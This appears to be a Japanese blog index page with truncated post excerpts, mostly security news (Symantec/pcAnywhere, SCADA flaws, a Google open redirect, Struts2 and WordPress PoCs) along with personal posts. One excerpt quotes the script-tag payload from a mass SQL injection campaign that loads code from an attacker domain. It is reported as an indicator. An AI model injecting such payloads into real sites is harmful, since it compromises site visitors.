Symantec社から各種製品の2006年のソースコードが奪われた事件に起因した、セキュリティの警告が出ています。 その中でも「pcAnywhere」というリモートアクセスのソフトウェアは、中間者攻撃を受けたり、盗聴されるなどの可能性があり、危険なため使用を停止…

Stuxnet以来、SCADAシステムのセキュリティが注目されていますが、Reid Wightman氏を始めとしたベースキャンプチームが6社のSCADAシステムのセキュリティ調査を行いました。 調査対象となたシステムは5社7製品で下記のとおり。 Control Microsystems SCADAPa…

NSA（国家安全保障局）は、Android Security Enhanced (SE)の最初のバージョンをリリースしました。 このシステムはAndroidのセキュリティホールの影響を最小限に抑えるように設計されたシステムで、Androidの中でSELinuxが使えるそうです。SELinuxがAndroid…

任意のURLにリダイレクトできるオープンリダイレクタの状態になっていたようです。一見、GoogleなどのURLに見えますが、攻撃者が指定したサイトに自動的に遷移してしまいます。 Google https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.s…

GoogleはChromeブラウザの最新ベータ版に、ユーザーがWebサイトから悪意のあるソフトウェアをダウンロードしようとするときに警告する機能を搭載しました。 ダウンロードした実行可能ファイル（.exeや.msiなど）に含まれるマルウェアを分析するための拡張機…

毎回台湾に行くたびにパイナップルケーキの食べ比べをしている気もしますが、今回もまた食べ比べています。 前回現地の方からの貰い物だった『佳徳糕餅（ジャーダーガオピン）』のお店にも行ってきました。前回の食べ比べはこちら。 2011.7.31: 台湾の人気パ…

Apache Struts2 (脆弱性を攻撃するPoCが公開されています。リモートからのコマンド実行など重大なものもあります。 Apache Struts2 Ver.2.3.1.1で修正されているので、要アップデートです。 Apache Struts2 <= 2.3.1 Multiple Vulnerabilities

自分用のメモ 事前の確認事項 国際電話が利用可能なこと（WORLD CALL？） 転送電話サービスを申し込んでいること 国際転送電話サービスを申し込んでいること 遠隔操作設定を可能にしておく（「159」にコール） 転送電話サービスなどを申し込んでいない場合は…

元日の読売1面記事になった割には、国内でもあまり騒がれていない防衛省の対サイバー兵器のニュース（防衛省が対サイバー兵器、攻撃を逆探知し無力化 : 社会 : YOMIURI ONLINE（読売新聞））ですが、海外の反応も地味なものです。 The Hacker News (THN)が「…

Wordpress最新版のVer.3.3にクロスサイト・スクリプティング（XSS）が発見されました。 今のところ0-dayのようで、PoCも公開されまくっています。運用されている方はご注意を。 An Old man lab0ratory: Wordpress 3.3 XSS vulnerability

ISC(Internet Storm Center)のレポートによると、lilupophilupop.comへのリンクを埋め込むSQLインジェクション攻撃の被害がおよそ100万サイトで確認されています。 攻撃されると以下の文字列を挿入されているのが確認できるとのこと。 "> "></title><script src="http://lilupophilupop.com/sl.php"></script> - Google 検索 …

毎年1月1日は著作権の期限が切れる瞬間を祝う Public Domain Dayです。 書籍やフィルム、写真、楽曲に至るまで誰もが自由に使えるようになる日です。今年著作権が切れるのは、海外では、Louis Brandeis, James Joyce, Virginia Woolfなど名前が挙がっていま…

今朝方お神籤を引いてきたところ、1番大吉をひきました。今年も良い年になりますように。